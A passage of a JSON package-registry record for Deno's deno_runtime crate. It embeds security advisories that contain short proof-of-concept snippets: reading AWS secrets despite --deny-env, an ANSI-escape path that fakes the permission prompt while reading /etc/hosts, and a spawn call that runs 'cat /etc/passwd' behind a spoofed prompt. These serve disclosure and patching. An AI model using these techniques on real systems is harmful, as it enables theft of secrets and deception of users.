--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n```\n\nThe first example using `get` exits with the following error:\n```\nerror: Uncaught (in promise) NotCapable: Requires env access to \"AWS_SECRET_ACCESS_KEY\", run again with the --allow-env flag\nconsole.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));\n                     ^\n    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)\n    at file:///$deno$stdin.mts:1:22\n```\n\nThe second example  using `toObject` prints all environment variables:\n```\n[Object: null prototype] {\n  ...\n  AWS_SECRET_ACCESS_KEY: \"my-secret-aws-key\",\n  ...\n}\n```\n\n### Impact\nSoftware relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:18:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789","https://github.com/denoland/deno/pull/29079","https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f","https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753","https://docs.deno.com/api/deno/~/Deno.Env.toObject","https://docs.deno.com/runtime/fundamentals/security/#environment-variables","https://nvd.nist.gov/vuln/detail/CVE-2025-48934","https://github.com/advisories/GHSA-7w8p-chxq-2789"],"source_kind":"github","identifiers":["GHSA-7w8p-chxq-2789","CVE-2025-48934"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.484Z","updated_at":"2026-09-01T18:05:58.789Z","epss_percentage":0.00396,"epss_percentile":0.3251,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","url":"https://github.com/advisories/GHSA-xqxc-x6p3-w683","title":"Deno run with --allow-read and --deny-read flags results in allowed","description":"### Summary\n\n`deno run --allow-read --deny-read main.ts` results in allowed, even though 'deny' should be stronger. Same with all global unary permissions given as `--allow-* --deny-*`.\n\n### Details\n\nCaused by the fast exit logic in #22894.\n\n### PoC\n\nRun the above command expecting no permissions to be passed.\n\n### Impact\n\nThis only affects a nonsensical combination of flags, so there shouldn't be a real impact on the userbase.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:13:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-xqxc-x6p3-w683","https://github.com/denoland/deno/pull/22894","https://github.com/denoland/deno/pull/29213","https://github.com/denoland/deno/commit/2f0fae9d9071dcaf0a689bc7097584b1b9ebc8db","https://github.com/denoland/deno/commit/9d665572d3cd39f997e29e6daac7c1102fc5c04f","https://github.com/denoland/deno/commit/ef315b56c26c9ef5f25284a5100d2ed525a148cf","https://nvd.nist.gov/vuln/detail/CVE-2025-48888","https://github.com/advisories/GHSA-xqxc-x6p3-w683"],"source_kind":"github","identifiers":["GHSA-xqxc-x6p3-w683","CVE-2025-48888"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.932Z","updated_at":"2026-09-01T18:05:58.790Z","epss_percentage":0.00378,"epss_percentile":0.305,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003e= 0.150.0, \u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.3.2","vulnerable_version_range":"\u003e= 2.3.0, \u003c 2.3.2"},{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003e= 1.41.3, \u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","url":"https://github.com/advisories/GHSA-m4pq-fv2w-6hrw","title":"Deno's deno_runtime vulnerable to interactive permission prompt spoofing via improper ANSI stripping","description":"### Summary\nA maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents.\n\n### Details\nIn [the patch for CVE-2023-28446](https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d), Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences.\n\nFor example, requesting the read permission with `/tmp/hello\\u001b[/../../etc/hosts` as a path will display the `/tmp/hellotc/hosts` in the permission prompt, but the actual permission given to the program is `/tmp/hello\\u001b[/../../etc/hosts`, which is `/etc/hosts` after the normalization.\n\nThis difference allows a malicious Deno program to spoof the contents of the permission prompt.\n\n\n### PoC\nRun the following JavaScript and observe that `/tmp/hellotc/hosts` is displayed in the permission prompt instead of `/etc/hosts`, although Deno gives access to `/etc/hosts`.\n``` javascript\nconst permission = { name: \"read\", path: \"/tmp/hello\\u001b[/../../etc/hosts\" };\nawait Deno.permissions.request(permission);\nconsole.log(await Deno.readTextFile(\"/etc/hosts\"));\n```\n\n#### Expected prompt\n```\n┌ ⚠️  Deno requests read access to \"/etc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n```\n\n#### Actual prompt\n```\n┌ ⚠️  Deno requests read access to \"/tmp/hellotc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n\n```\n\n### Impact\nAny Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-05T20:54:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw","https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d","https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5","https://nvd.nist.gov/vuln/detail/CVE-2024-27936","https://github.com/advisories/GHSA-m4pq-fv2w-6hrw"],"source_kind":"github","identifiers":["GHSA-m4pq-fv2w-6hrw","CVE-2024-27936"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T21:04:54.551Z","updated_at":"2026-09-01T18:08:08.198Z","epss_percentage":0.00943,"epss_percentile":0.58577,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.147.0","vulnerable_version_range":"\u003e= 0.103.0, \u003c 0.147.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.41.0","vulnerable_version_range":"\u003e= 1.32.1, \u003c 1.41.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","url":"https://github.com/advisories/GHSA-vc52-gwm3-8v2f","title":"Missing \"--allow-net\" permission check for built-in Node modules","description":"### Impact\n\nOutbound HTTP requests made using the built-in \"node:http\" or \"node:https\" modules are incorrectly not checked against the network permission allow list (`--allow-net`). Dependencies relying on these built-in modules are subject to the vulnerability too.\n\nUsers of Deno versions prior to 1.34.0 are unaffected. Deno Deploy users are unaffected.\n\n### Patches\n\nThis problem has been patched in Deno v1.34.1 and all users are recommended to update to this version.\n\n### Workarounds\n\nNo workaround is available for this issue.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-05-31T23:39:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vc52-gwm3-8v2f","https://nvd.nist.gov/vuln/detail/CVE-2023-33966","https://github.com/denoland/deno/releases/tag/v1.34.1","https://github.com/advisories/GHSA-vc52-gwm3-8v2f"],"source_kind":"github","identifiers":["GHSA-vc52-gwm3-8v2f","CVE-2023-33966"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-06-01T00:03:15.490Z","updated_at":"2026-09-01T18:12:29.999Z","epss_percentage":0.00625,"epss_percentile":0.47532,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.115.0","vulnerable_version_range":"= 0.114.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.34.1","vulnerable_version_range":"= 1.34.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","url":"https://github.com/advisories/GHSA-vq67-rp93-65qf","title":"Interactive `run` permission prompt spoofing via improper ANSI neutralization","description":"### Summary\nArbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text.\n\n### Details\n\nThe main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`.\n\n### PoC\n\nThis PoC works on 1.31.1, but modified versions of it work on older versions.\n\nMake a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt\n\n```ts\nconst boldANSI = \"\\u001b[1m\" // bold\nconst unboldANSI = \"\\u001b[22m\" // unbold\n\nconst prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to \"echo\"${unboldANSI}\n├ Requested by \\`Deno.Command().output()`\n\nconst moveANSIUp = \"\\u001b[1A\" // moves to the start of the line\nconst clearANSI = \"\\u001b[2K\" // clears the line\nconst moveANSIStart = \"\\u001b[1000D\" // moves to the start of the line\n\nDeno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({\n    cmd: \"cat\",\n    args: [\"/etc/passwd\"],\n    clearEnv: false,\n    env: [],\n    stdin: \"null\",\n    stdout: \"inherit\",\n    stderr: \"piped\"\n}, moveANSIUp + clearANSI + moveANSIStart + prompt)\n```\n\nRun the file with `deno run index.ts`.\n\n### Impact\nAny Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed:\n\n```\n// Expected Prompt\n┌ ⚠️  Deno requests run access to \"cat\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n\n// Actual Prompt\n┌ ⚠️  Deno requests run access to \"echo\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n```\n\nThis works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers).\n\nBefore `v1.31.0`, this requires the `--unstable` flag. \n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-03-24T22:06:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf","https://nvd.nist.gov/vuln/detail/CVE-2023-28446","https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175","https://github.com/denoland/deno/releases/tag/v1.31.2","https://github.com/advisories/GHSA-vq67-rp93-65qf"],"source_kind":"github","identifiers":["GHSA-vq67-rp93-65qf","CVE-2023-28446"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T23:03:48.690Z","updated_at":"2026-09-01T18:12:41.906Z","epss_percentage":0.01142,"epss_percentile":0.63506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno_runtime"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-01T18:12:32.825Z","epss_percentage":0.00971,"epss_percentile":0.585,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_runtime","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T16:24:06.059Z","updated_at":"2022-11-07T16:24:06.059Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.613Z","updated_at":"2023-07-18T22:41:23.613Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858421,"name":"pacup","ecosystem":"cargo","description":"Help maintainers update pacscripts","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:15:53.239Z","latest_release_published_at":"2023-01-11T08:22:33.605Z","latest_release_number":"2.0.0","last_synced_at":"2026-08-29T21:56:43.586Z","created_at":"2023-01-11T08:24:13.993Z","updated_at":"2026-08-29T21:56:43.587Z","registry_url":"https://crates.io/crates/pacup/","install_command":"cargo install pacup","documentation_url":"https://docs.rs/pacup/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively 